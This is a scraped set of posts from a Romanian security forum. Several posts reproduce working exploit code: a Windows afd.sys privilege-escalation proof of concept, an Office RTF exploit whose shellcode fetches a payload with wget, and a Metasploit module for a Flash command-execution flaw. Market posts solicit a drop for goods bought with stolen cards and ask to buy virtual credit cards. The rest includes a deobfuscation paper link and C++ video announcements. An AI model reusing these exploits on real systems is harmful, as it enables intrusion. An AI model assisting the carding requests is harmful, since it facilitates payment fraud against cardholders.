Adress: 0x%x ",p[i].Base); krl_base = p[i].Base; break; } else { printf("\n [+]Cdnt find, and am out\n"); exit(0); } } free(q); printf("\n[+] Continue with Exploitation\n"); HalDispatchTable = (ULONG_PTR)GetProcAddress(krl_addr, "HalDispatchTable"); if( !HalDispatchTable ) { printf("[!!] Sh*t happen with HalDispatchTablen"); return FALSE; } printf("\tBase Nt=: 0x%x ",krl_base); HalDispatchTable -= ( ULONG_PTR )krl_addr; HalDispatchTable += krl_base; printf("\n[+] HalDispatchTable found \t\t\t [ 0x%p ]\n",HalDispatchTable); printf("[+] ZwQueryIntervalProfile "); ZwQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQueryIntervalProfile"); if( !ZwQueryIntervalProfile ) { printf("[!!] Sh*t happen resolving ZwQueryIntervalProfile\n"); return FALSE; } printf( "\t\t\t [ 0x%p ]\n",ZwQueryIntervalProfile ); printf("[+] ZwAllocateVirtualMemory"); ZwAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle( "ntdll.dll"), "ZwAllocateVirtualMemory"); if( !ZwAllocateVirtualMemory ) { printf("[!!] Unable to resolve ZwAllocateVirtualMemory\n"); return FALSE; } printf( "\t\t\t [ 0x%p ]\n",ZwAllocateVirtualMemory ); printf("\n[+] Allocating memory at [ 0x%p ]...\n",hexcode_addr); alloc_status = ZwAllocateVirtualMemory( INVALID_HANDLE_VALUE, &hexcode_addr, 0, &sizeofshell, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); printf("\n[+] status %p.\n",alloc_status ); if( alloc_status != 0 ) { printf("[-] Sh*t happen with NtAllocateVirtualMemory() , %#X\n", alloc_status); } printf("\t\tZwAllocateVirtualMemory() Allocated return Status, %#X\n", alloc_status); memset(hexcode_addr, 0x90, sizeofshell); memcpy( (void*)((BYTE*)hexcode_addr + 0x100),(void*)hexcode, sizeof(hexcode)); iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != 0) { printf("WASUP Failed: %d\n", iResult); return 1; } iResult = getaddrinfo(DEFAULT_ADDR, DEFAULT_PORT, &hints, &result); ptr=result; // SOCKET for connecting to localhost at 135 ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); if (ConnectSocket == INVALID_SOCKET) { printf("[-] This is bad , Socket Error : %ld\n", WSAGetLastError()); freeaddrinfo(result); WSACleanup(); return 1; } // Connect to server. iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); if (iResult == SOCKET_ERROR) { closesocket(ConnectSocket); ConnectSocket = INVALID_SOCKET; printf("[+]Unable to connect to server, modify code and add a server socket, and connect to it!\n"); WSACleanup(); return ; } else { printf("[+]Hola Connected to server !\n"); } memset(ibuf,0x90,sizeof(ibuf)); memset(obuf,0x90,sizeof(obuf)); DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf,sizeof(ibuf), (LPVOID)obuf,0, &Ret_size, NULL); for( i = 0; i < sizeof( hints ) ; i++) { printf(" %02X ",(unsigned char)obuf[i]); } printf("\n\n[+] Overwriting HalDispatchTable with those bytes..."); DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf,sizeof(ibuf), (LPVOID)HalDispatchTable,0, &Ret_size, NULL); printf("\n\n[+] This should work and break..."); ZwQueryIntervalProfile(stProfile,&result); } Sursa: MS11-046 Afd.sys Proof of Concept

[h=1]Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service[/h] Source: http://www.securityfocus.com/bid/52735/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. The following Wireshark versions are vulnerable: 1.4.0 through 1.4.11 1.6.0 through 1.6.5 PoC: http://www.exploit-db.com/sploits/18758.pcap Sursa: Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service

[h=1]Office 2008 sp0 RTF Pfragments MAC exploit[/h] #RTF Pfragments exploit for MAC office 2008 #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com #Advanced Hacking Trainings - http://training.aslitsecurity.com #Web - http://www.aslitsecurity.com/ #Blog - http://www.aslitsecurity.blogspot.com/ #Office 2007 for MC SP 0 #!/usr/bin/python myfile = ( "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b" "\x5c\x73\x6e\x20\x70\x46\x72\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b" "\x5c\x73\x76\x20\x39\x3b\x32\x3b\x31\x31\x31\x31\x31\x31\x31\x31" "\x37\x35\x30\x30\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "f069837c" # call esp "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x62\x61\x30\x30" "\x30\x30\x35\x30\x30\x30\x36\x36\x38\x31\x63\x61\x66\x66\x30\x66" "\x34\x32\x35\x32\x36\x61\x30\x32\x35\x38\x63\x64\x32\x65\x33\x63" "\x30\x35\x35\x61\x37\x34\x65\x66\x62\x38\x37\x30\x36\x39\x36\x65" "\x36\x37\x38\x62\x66\x61\x61\x66\x37\x35\x65\x61\x61\x66\x37\x35" "\x65\x37\x35\x37\x63\x33\x7d\x7d\x7d\x7d" ) sign = ( "\x70\x69\x6e\x67\x70\x69\x6e\x67" ) shellcode = "\xCC\xCC\xCC\xCC" shellcode += "http://www.site.com/payload.DMG" shellcode += "\x11\x3A\x65\x89\x11\x3A\x65\x89\x11\x3A\x65\x89" #("wget http://") shellcode += "wget " shellcode += "\x1A\x18\x19\x02" exploit = open("output.doc", mode="wb") exploit.write(myfile + sign + shellcode) print "Done" Sursa: Office 2008 sp0 RTF Pfragments MAC exploit

[h=1]Adobe Flash Player ActionScript Launch Command Execution Vulnerability[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability', 'Description' => %q{ This module exploits a vulnerability in Adobe Flash Player for Linux, version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36). }, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version ], 'References' => [ ['CVE', '2008-5499'], ['OSVDB', '50796'], ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'], ['URL', 'http://www.securityfocus.com/bid/32896/exploit'] ], 'DefaultOptions' => { 'HTTP::compression' => 'gzip', 'HTTP::chunked' => true }, 'Platform' => 'unix', # so unix cmd exec payloads are ok 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Automatic', {}], ], 'DisclosureDate' => 'Dec 17 2008', 'DefaultTarget' => 0)) end def exploit path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" ) fd = File.open( path, "rb" ) @swf = fd.read(fd.stat.size) fd.close super end def on_request_uri(cli, request) msg = "#{cli.peerhost.ljust(16)} #{self.shortname}" trigger = @swf trigger_file = rand_text_alpha(rand(6)+3) + ".swf" obj_id = rand_text_alpha(rand(6)+3) if request.uri.match(/\.swf/i) print_status("#{msg} Sending Exploit SWF") send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' }) return end if request.uri.match(/\.txt/i) send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) return end html = <<-EOS <html> <head> </head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> <param name="movie" value="#{get_resource}#{trigger_file}" /> <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"> </embed> </object> </center> </body> </html> EOS print_status("#{msg} Sending HTML...") send_response(cli, html, { 'Content-Type' => 'text/html' }) end end Sursa: Adobe Flash Player ActionScript Launch Command Execution Vulnerability

Bla bla bla. Vreau sa vad acea poza. Asta ca sa nu va dau ban la amandoi.

Salut, Am facut o prima versiune a aplicatiei de citit mesajele private. Stiu ca arata ca pula, dar e oarecum functional, putin limitat momentan. Limitari: - arata ca dracu - codul nu e scris tocmai profesional - implicit, afiseaza doar ultimele 30 de mesaje private - nu are niciun fel de paginare - intoarce doar ultimele 100 (LIMIT) de rezultate (DESC) ale cautarilor - nu are protectii de CSRF (lene) si SQL Injection (sa nu fie probleme cu cautarile) - daca mesajul e trimis catre mai multe persoane, nu le afiseaza O sa mai lucrez la el, poate maine sau in curand, e 4:43 AM acum. Momentau au acces doar: - 3871 = Nytro - 989 = Zatarra - 21017 = pyth0n3 - 13607 = begood - 15061 = MrRip - 1 = []kw3rln Daca mai doreste cineva acces, sa ma contacteze. Sa imi spuneti de eventuale probleme. Link: https://rstcenter.com/linkeditat Bafta.

JavaScript Deobfuscation A Manual Approach Sudeep Singh 4/15/2012 Table of Contents Preface .......................................................................................................................................................... 3 Reasons for JavaScript Obfuscation .............................................................................................................. 4 Javascript Minifiers vs Obfuscators ............................................................................................................... 4 Methods of JavaScript Obfuscation .............................................................................................................. 5 Basic JavaScript Obfuscation ......................................................................................................................... 6 Blackhole Exploit Kit .................................................................................................................................... 12 Breaking Point Obfuscated JS Challenge ..................................................................................................... 23 JS Obfuscation in MetaSploit Framework ................................................................................................... 34 Conclusion ................................................................................................................................................... 37 References .................................................................................................................................................. 37 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18746.pdf

Bun, tinem la seed.

https://www.secmaniac.com/blog/2012/04/12/disallowing-infosec-institute-to-leverage-set/

Nu stiu ce ati scris mai sus, dar la RST market, neaprobate: dxbut Am nevoie de un drop (pers ce primeste un colet cu produse cardate).Discutam. ------------------------------------------------------------------------ napoletanii Cumpar Virtual Credit Card cu 50 usd pe el de preferat sa fie visa si sa pot primi plati pe el. Platesc LR estimativ: pentru un vcc cu balance de 50 usd platesc 68 usd Am incercat 2 siteuri din multitudinea de "culori" de pe google (neavand timp sa ma informez daca chiar sunt sigure site-urile) https://www.instantvirtualcreditcards.com am primit cartea instant dar cartile vin cu sume mici (intre 5/10 usd) Buy VCC(Virtual Credit Card) Paypal VCC | Facebook VCC | ebay VCC | Facebook Coupons |and Virtual Credit Card for Online Purchase e un site nou facut in ianuarie si l-am incercat , e in pending tranzactia de 2 zile;) drept urmare am ajuns la varianta asta

Sfinte cacat, voi sunteti batuti in cap. Ba 2 dolari pe zi, ba 5 dolari pe saptamana... Ce cacat faceti cu "banii" astia? Angajati-va ca spalatori de parbrize, tiganusii aia castiga 25-30 de RON pe zi, adica 10 dolari pe zi, adica se pisa pe voi milogilor. Bani din click-uri? Altceva nu puteti face? Asta e tot ce va ofera materia cenusie, sa dati clickuri? Faceti in cacat niste proiecte, 2-3 gratis, apoi 2-3 mai ieftine, apoi ies bani, se aduna lucruri pe CV, va angajati si luati 1500 - 2000 RON ca prim salariu, adica mai mult de 2 dolari pe zi.

[h=1]GoingNative 6: Walter Bright and Andrei Alexandrescu - D Programming Language[/h] Posted: Feb 21, 2012 at 4:21 PM By: Charles We're back! Sorry for the delay between episodes, but we were busy preparing and then putting on GoingNative 2012, a C++11 conference that you have hopefully heard about It was a blast! Such great speakers. Such great attendees. Huge thanks to all of you who made the journey to Redmond for two days, bringing with you so much IQ and C++ love. And to those who watched the show live online, thank you, too, of course! All sessions will always be available on-demand right here on C9. Watch at your leisure, but do watch/listen/learn! We were fortunate and honored to have Andrei Alexandrescu speaking and Walter Bright in attendance at GoingNative 2012. Walter and Andrei are the co-custodians of the D programming language. Walter invented D about 11 or 12 years ago. Andrei has been an unrelenting champion and contributor to D for a long time and is the author of the book The D Programming Language. When/why did Andrei get involved with D? We'll find out. We filmed a conversation with these two legends right after GoingNative 2012 ended. So, what is D? What makes it special? D is a modern native programming language (not really an evolution of C++ as the name might imply. C++11 is an evolution of C++... D is it's own thing. It's D.). D is imperative (with C-like syntax), statically-typed, object-oriented, dynamic-friendly (via static type inference), garbage collected (optional), shared-nothing by default (nice!), functional-friendly (you can write pure functions that are verifiably pure), polymorphic, generic, and COM-friendly, too. D is also a low-level systems programming language. D takes many powerful modern programming ideas and idioms and makes them easy to use while keeping things purely native. We love this! Too often we hear things like, "Well, if you go fully native then you loose productivity..." Whatever. D proves you can have your cake and eat it, too. Tune in. Meet Walter and Andrei (and D, if you're not familiar with it). Thanks for spending time with C9, Walter and Andrei! Keep pushing the native envelope. "I want 1,000,000 users", says Andrei. Go D! Download D D Forums (written in D) Modern COM Programming in D Table of Contents: [00:00] GoingNative(); //Welcome back! Sorry for the delay. GoingNative 2012. D. [02:22] Charles has a conversation with Andrei Alexandrescu and Walter Bright about the D programming language [56:52] ~GoingNative(); //Charles and Diego talk about D and then destruct. Download: http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-6-The-D-Episode-with-Walter-Bright-and-Andrei-Alexandrescu

[h=1]GoingNative 5: Inside the Visual C++ IDE, Meet Raul Pérez[/h] Posted: Dec 28, 2011 at 10:21 AM By: Charles Happy Holidays to all of you out there who are in some sort of holiday state. If not, then happy holidays anyway from Diego, Charles, C9, and VC We don't cover software testing—the job discipline—often enough on C9. We aim to change that starting now. A friend of Diego's on the VC++ team, Raul Pérez, is a software developer from Puerto Rico who works in QA for the Visual C++ IDE team. He writes tests to make sure the very-front-end of the VC toolchain—the IDE and its design-time compiler infrastructure—works as expected. There's a lot going on when you type characters into the VC++ editor. What happens, exactly? Why? What types of things can make Intellisense fast? What types of things can hinder the performance of the IDE? How does all of this magic happen? There's a compiler involved in all of this. It's not the front-end compiler (cl), but it is a front-end compiler and it compiles your source into data that's stored in a local DB for design-time use by Intellisense, Go-To-Definition, Syntax Coloring, Reference Highlighting, Auto-Completion, etc... All of these things are part of the set of IDE features that make Visual C++ visual... So, meet Raul and learn a thing or two about how the IDE works under the covers and how the system has evolved over time. Table of Contents (click time code links to navigate player accordingly) [00:00] GoingNative();//Getting faster at show construction - still have some optimizations to make... [01:56] Charles interviews Raul about Raul and the VC++ design-time system (Intellisense, Go-to-Definition, Auto-complete, Syntax coloring, etc...) [37:20] ~GoingNative(); //We're really performant this time We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative [at] hotmail [dot] com. We will read and respond to all messages! That's how we roll, brothers and sisters. And if you're a Facebook user, please join our C9::GoingNative Facebook group. Go native! Download: http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-5-Inside-the-Visual-C-ID-Meet-Raul-Prez

[h=1]GoingNative 3: The C++/CX Episode with Marian Luparu[/h] Posted: Oct 26, 2011 at 10:24 AM By: Charles This is the C++/CX episode - everything you ever wanted to know, but were afraid to ask... C++/CX language design team member Marian Luparu sits in the hot seat to answer some questions (a few from the GoingNative community - thank you!), draw on the whiteboard and demo some code. It's all about C++/CX. Tune in. Table of Contents (click time code links to navigate player accordingly) [00:00] GoingNative(); //Welcome. Diego spreads the news. [06:05] Charles interviews Marian Luparu (Whiteboarding included) [43:04] Marian Luparudemos some C++/CX and C++ [58:37] ~GoingNative(); //Charles and Diego recap. Don't fear the hat. We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative at hotmail com. We will read and respond to all messages! That's how we roll, brothers and sisters. If you are a Facebook user, then please join our C9::GoingNative Facebook group. Go native! Download: http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_2MB_ch9.wmv http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_high_ch9.mp4 Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-3-The-CCX-Episode-with-Marian-Luparu